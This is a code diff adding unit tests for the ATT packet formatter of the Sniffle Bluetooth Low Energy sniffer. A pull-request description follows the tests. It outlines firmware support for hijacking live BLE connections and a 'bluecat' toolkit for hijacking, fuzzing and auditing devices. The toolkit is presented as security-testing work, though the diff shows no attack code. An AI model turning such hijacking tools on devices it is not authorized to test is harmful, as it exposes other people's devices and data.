+        results = scan_and_audit(hw=None, include_private=False)
+
+        assert dev_nrpa.mac not in audited_macs, "NRPA should be skipped with include_private=False"
+        assert results == []

--- a/python_cli/tests/test_sniff.py
+++ b/python_cli/tests/test_sniff.py
@@ -1,0 +1,270 @@
+"""Unit tests for sniffle.sniff.format_att_op (pure, no hardware)."""
+
+import struct
+import pytest
+from serial import SerialTimeoutException
+from sniffle.sniff import format_att_op, sniff_connection
+from sniffle.packet_decoder import DPacketMessage
+
+
+def _version_ind_msg(company):
+    """A decoded peripheral->central LL_VERSION_IND (BT 5.0) for *company*."""
+    payload = bytes([0x0C, 9, company & 0xFF, company >> 8, 0, 0])
+    body = bytes([0x03, len(payload)]) + payload
+    return DPacketMessage.from_body(body, is_data=True, peripheral_send=True)
+
+
+class _SeqHW:
+    """Minimal HW stub: yields queued decoded messages, then times out."""
+    def __init__(self, msgs):
+        self._msgs = list(msgs)
+
+    def setup_sniffer(self, **k):
+        pass
+
+    def cmd_instahop(self, *a):
+        pass
+
+    def mark_and_flush(self):
+        pass
+
+    def recv_and_decode(self):
+        if self._msgs:
+            return self._msgs.pop(0)
+        raise SerialTimeoutException()
+
+
+def test_sniff_surfaces_ll_version_company():
+    """A passively-observed LL_VERSION_IND surfaces the controller's SIG company."""
+    hw = _SeqHW([_version_ind_msg(0x0059)])   # Nordic Semiconductor ASA
+    lines = []
+    sniff_connection(hw, target_mac=[1, 2, 3, 4, 5, 6], advchan=37,
+                     duration=0.05, on_op=lines.append)
+    assert any("Nordic" in l for l in lines)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _make_pdu(*hex_strs):
+    """Concatenate hex strings into a bytes object."""
+    return bytes.fromhex("".join(hex_strs.replace(" ", "") for hex_strs in hex_strs))
+
+
+# ---------------------------------------------------------------------------
+# Write Command  0x52
+# ---------------------------------------------------------------------------
+
+def test_write_cmd_basic():
+    # 0x52  handle=0x000E  value=7e0705 03ff000010ef
+    pdu = bytes.fromhex("52" "0e00" "7e070503ff000010ef")
+    line, new_rh = format_att_op(pdu, is_p_to_c=False, read_handle=None)
+
+    assert "WRITE-CMD" in line
+    assert "0x000E" in line
+    assert "7e 07 05 03" in line
+    assert new_rh is None
+
+
+def test_write_cmd_direction_c_to_p():
+    pdu = bytes.fromhex("52" "0100" "ab")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    assert "C→P" in line   # C→P
+
+
+# ---------------------------------------------------------------------------
+# Read Request  0x0A
+# ---------------------------------------------------------------------------
+
+def test_read_req_returns_handle():
+    # 0x0a  handle=0x0003
+    pdu = bytes.fromhex("0a" "0300")
+    line, new_rh = format_att_op(pdu, is_p_to_c=False, read_handle=None)
+
+    assert "READ-REQ" in line
+    assert "0x0003" in line
+    assert new_rh == 0x0003     # handle is remembered for correlation
+
+
+# ---------------------------------------------------------------------------
+# Read Response  0x0B
+# ---------------------------------------------------------------------------
+
+def test_read_rsp_uses_remembered_handle():
+    # 0x0b  value=454c4b ("ELK")  with read_handle=0x0003 from prior Read Request
+    pdu = bytes.fromhex("0b" "454c4b")
+    line, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=0x0003)
+
+    assert "READ-RSP" in line
+    assert "0x0003" in line
+    assert '"ELK"' in line
+    assert new_rh is None       # correlation consumed
+
+
+def test_read_rsp_unknown_handle():
+    pdu = bytes.fromhex("0b" "ff")
+    line, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=None)
+    assert "READ-RSP" in line
+    assert "0x????" in line
+    assert new_rh is None
+
+
+# ---------------------------------------------------------------------------
+# Notification  0x1B
+# ---------------------------------------------------------------------------
+
+def test_handle_value_notify():
+    # 0x1b  handle=0x0010  value=abcd
+    pdu = bytes.fromhex("1b" "1000" "abcd")
+    line, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=None)
+
+    assert "NOTIFY" in line
+    assert "0x0010" in line
+    assert new_rh is None
+
+
+def test_handle_value_notify_direction():
+    pdu = bytes.fromhex("1b" "0100" "01")
+    line, _ = format_att_op(pdu, is_p_to_c=True)
+    assert "P→C" in line   # P→C
+
+
+# ---------------------------------------------------------------------------
+# Error Response  0x01
+# ---------------------------------------------------------------------------
+
+def test_error_rsp_insufficient_auth():
+    # 0x01  req_op=0x0a  handle=0x0003  err=0x05 (Insufficient Authentication)
+    pdu = bytes.fromhex("01" "0a" "0300" "05")
+    line, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=None)
+
+    assert "ERROR" in line
+    assert "0x0003" in line
+    assert "Insufficient Authentication" in line
+    # read_handle is preserved on error (not consumed)
+
+
+# ---------------------------------------------------------------------------
+# Write Request  0x12
+# ---------------------------------------------------------------------------
+
+def test_write_req():
+    pdu = bytes.fromhex("12" "0500" "deadbeef")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    assert "WRITE-REQ" in line
+    assert "0x0005" in line
+    assert "de ad be ef" in line
+
+
+# ---------------------------------------------------------------------------
+# Write Response  0x13
+# ---------------------------------------------------------------------------
+
+def test_write_rsp():
+    pdu = bytes.fromhex("13")
+    line, _ = format_att_op(pdu, is_p_to_c=True)
+    assert "WRITE-RSP" in line
+    assert "ok" in line
+
+
+# ---------------------------------------------------------------------------
+# Handle Value Indication  0x1D
+# ---------------------------------------------------------------------------
+
+def test_handle_value_indicate():
+    pdu = bytes.fromhex("1d" "0200" "0102")
+    line, _ = format_att_op(pdu, is_p_to_c=True)
+    assert "INDICATE" in line
+    assert "0x0002" in line
+
+
+# ---------------------------------------------------------------------------
+# Discovery opcodes
+# ---------------------------------------------------------------------------
+
+def test_read_by_group_req():
+    pdu = bytes.fromhex("100100ffff0028")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    assert "DISCOVER" in line
+    assert "service" in line.lower()
+
+
+def test_read_by_group_rsp():
+    pdu = bytes.fromhex("110601000700001808000b000118")
+    line, _ = format_att_op(pdu, is_p_to_c=True)
+    assert "DISCOVER" in line
+    assert "service" in line.lower()
+
+
+def test_read_by_type_req():
+    pdu = bytes.fromhex("08010001000328")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    assert "DISCOVER" in line
+    assert "characteristic" in line.lower()
+
+
+def test_find_info_req():
+    pdu = bytes.fromhex("040300ffff")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    assert "DISCOVER" in line
+    assert "descriptor" in line.lower()
+
+
+# ---------------------------------------------------------------------------
+# Unknown opcode falls back to generic line
+# ---------------------------------------------------------------------------
+
+def test_unknown_opcode():
+    pdu = bytes.fromhex("ff" "1234")
+    line, _ = format_att_op(pdu, is_p_to_c=False)
+    # formatter uses uppercase hex for the opcode
+    assert "ATT 0xFF" in line
+
+
+# ---------------------------------------------------------------------------
+# read_handle is NOT consumed by non-response opcodes
+# ---------------------------------------------------------------------------
+
+def test_read_handle_preserved_across_notify():
+    pdu = bytes.fromhex("1b" "0200" "aa")
+    _, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=0x0005)
+    assert new_rh == 0x0005     # notify doesn't consume the pending read handle
+
+
+def test_read_handle_consumed_by_read_rsp():
+    pdu = bytes.fromhex("0b" "aa")
+    _, new_rh = format_att_op(pdu, is_p_to_c=True, read_handle=0x0007)
+    assert new_rh is None
+
+
+def test_read_req_overrides_pending_handle():
+    # A second Read Request should update (override) the remembered handle.
+    pdu = bytes.fromhex("0a" "0900")
+    _, new_rh = format_att_op(pdu, is_p_to_c=False, read_handle=0x0001)
+    assert new_rh == 0x0009
+
+
+# ---------------------------------------------------------------------------
+# UUID rendering in DISCOVER lines — hex (not decimal), with names when known
+# ---------------------------------------------------------------------------
+
+def test_fmt_uuid_known_16bit():
+    from sniffle.sniff import _fmt_uuid
+    assert _fmt_uuid(0x1800) == "0x1800 (Generic Access)"
+
+def test_fmt_uuid_unknown_16bit():
+    from sniffle.sniff import _fmt_uuid
+    assert _fmt_uuid(0xFFF3) == "0xFFF3"
+
+def test_fmt_uuid_128bit():
+    from sniffle.sniff import _fmt_uuid
+    u = "000028f10000848100000d911fff1830"
+    assert _fmt_uuid(u) == "0x" + u
+
+def test_discover_services_rsp_renders_hex_not_decimal():
+    # 0x1800 @1-7, 0x1801 @8-b — must NOT print decimal 6144/6145
+    pdu = bytes.fromhex("110601000700001808000b000118")
+    line, _ = format_att_op(pdu, is_p_to_c=True)
+    assert "0x1800 (Generic Access)" in line
+    assert "6144" not in line

--- a/python_cli/tests/test_sniff.py
+++ b/python_cli/tests/test_sniff.py
@@ -70,7 +70,7 @@ def test_write_cmd_basic():
 def test_write_cmd_direction_c_to_p():
     pdu = bytes.fromhex("52" "0100" "ab")
     line, _ = format_att_op(pdu, is_p_to_c=False)
-    assert "C→P" in line   # C→P
+    assert "C->P" in line   # C->P
 
 
 # ---------------------------------------------------------------------------
@@ -127,7 +127,7 @@ def test_handle_value_notify():
 def test_handle_value_notify_direction():
     pdu = bytes.fromhex("1b" "0100" "01")
     line, _ = format_att_op(pdu, is_p_to_c=True)
-    assert "P→C" in line   # P→C
+    assert "P->C" in line   # P->C
 
 
 # ---------------------------------------------------------------------------
@@ -246,7 +246,7 @@ def test_read_req_overrides_pending_handle():
 
 
 # ---------------------------------------------------------------------------
-# UUID rendering in DISCOVER lines — hex (not decimal), with names when known
+# UUID rendering in DISCOVER lines - hex (not decimal), with names when known
 # ---------------------------------------------------------------------------
 
 def test_fmt_uuid_known_16bit():
@@ -263,7 +263,7 @@ def test_fmt_uuid_128bit():
     assert _fmt_uuid(u) == "0x" + u
 
 def test_discover_services_rsp_renders_hex_not_decimal():
-    # 0x1800 @1-7, 0x1801 @8-b — must NOT print decimal 6144/6145
+    # 0x1800 @1-7, 0x1801 @8-b - must NOT print decimal 6144/6145
     pdu = bytes.fromhex("110601000700001808000b000118")
     line, _ = format_att_op(pdu, is_p_to_c=True)
     assert "0x1800 (Generic Access)" in line


### PR DESCRIPTION
## Summary

- Connection hijacking - firmware support to take over an already-established
  connection, plus the matching host command.
- bluecat - an offensive / security-testing BLE toolkit built on the existing
  Sniffle host library.
- CatSniffer V3 support - an activity-LED fix for the Electronic Cats CatSniffer.

The pieces are independent and grouped by commit, so they can be split into
separate PRs if you would rather review or merge them one at a time.

## What is included

### 1. Connection hijacking (firmware + host)
Take over an already-established connection from the sniffer. Adds the radio and
command support in firmware and the corresponding `SniffleHW` host command.
Files: `fw/CommandTask.*`, `fw/RadioTask.*`, `fw/RadioWrapper.*`,
`python_cli/sniffle/sniffle_hw.py`, `python_cli/hijack_poc.py`.

### 2. bluecat toolkit
A single `bluecat.py` CLI with subcommands `scan`, `audit`, `connect`, `hijack`,
`fuzz`, and `sniff`, built entirely on the existing Sniffle host library. It
scans and actively probes advertisers, audits a peripheral for common
weaknesses, connects as central, hijacks or follows a live connection,
enumerates the GATT database, and runs a multi-layer fuzzer (ATT values, handle
sweep, raw ATT opcodes, LL control), then drops into an interactive REPL.
New host modules under `python_cli/sniffle/` (`central_link`, `session`, `gatt`,
`att`, `recon`, `posture`, `audit`, `fuzzer`, `sniff`, `ll_version`), documented
in the README under `## bluecat Usage`, with a bench guide in
`docs/bluecat-testing-guide.md`.

### 3. CatSniffer V3 activity-LED fix
The CatSniffer V3 (`PLATFORM=CC1352P74_1M`) builds from the stock
`LP_CC1352P7_1` board definition, whose LED0 does not map to the CatSniffer's
LED. A CatSniffer-only build flag (`-DSNIFFLE_CATSNIFFER_LED_DIO=24`) drives the
activity LED on DIO_24; every other board is byte-for-byte unchanged.
Files: `fw/makefile`, `fw/PacketTask.c`.

## Testing

- Host-side: `cd python_cli && python3 -m pytest -q`. The suite fakes the device
  (`conftest.py`), so it runs without hardware.
- Firmware builds for all supported platforms via `fw/build_all_platforms.sh`;
  the CatSniffer LED fix was verified on hardware.

## Notes

- bluecat is a security-testing tool (connection hijacking, GATT fuzzing),
  intended for authorized testing of devices you own or are permitted to assess.
- Happy to split this into separate PRs (hijacking / bluecat / CatSniffer) if
  that is easier to review or if you only want a subset.